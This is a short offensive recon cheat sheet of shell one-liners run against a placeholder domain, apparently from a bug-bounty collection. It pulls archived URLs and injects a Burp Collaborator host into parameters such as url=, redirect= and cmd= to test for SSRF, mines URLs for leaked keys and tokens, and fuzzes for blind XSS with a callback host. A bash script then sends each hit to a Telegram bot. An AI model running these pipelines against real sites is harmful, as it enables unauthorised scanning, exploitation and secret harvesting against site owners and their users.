[~/OneLiner] $ ls

# Collecting urls + test ssrf
▶ gau domain.com | urlive | grep -E '(callback=|jsonp=|api_key=|api=|password=|email=|emailto=|token=|username=|csrf_token=|unsubscribe_token=|p=|q=|query=|search=|id=|item=|page_id=|secret=|url=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_urllogin_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file=|cmd=|ip=|ping=|lang=|edit=|LoginId=|size=|signature=|passinfo=)' | qsreplace EnterYourBurpCollabrator | concurl
# Collecting urls + search sensitive keys/token/secret
▶ echo domain.com | waybackurls | urlive | xkeys
# Collecting urls + test XSS + telegram notification
▶ echo domain.com | waybackurls | grep "=" | grep -v "png\|jpg\|js\|css\|gif\|txt" | qsreplace | dalfox pipe --blind https://{username}.xss.ht --found-action "./tele.sh @@query@@ @@type@@"
$ vi tele.sh
#!/usr/bin/env bash
# By Viloid ~ Sec7or Team
id="idRecipient"
token="TelegramBotToken"
waktu=$(date '+%d/%m/%Y-%H:%M:%S')
if [ $2 == "VULN" ]; then
	curl -s "https://api.telegram.org/bot$token/sendMessage" \
	-H 'Content-Type: application/json' \
	-d '{"chat_id": "'$id'", "text": "[XSS - Verified - '$waktu']\n\n[+] Query : '$1'\n"}'
else
	curl -s "https://api.telegram.org/bot$token/sendMessage" \
	-H 'Content-Type: application/json' \
	-d '{"chat_id": "'$id'", "text": "[XSS - Check - '$waktu']\n\n[+] Query : '$1'\n"}'
fi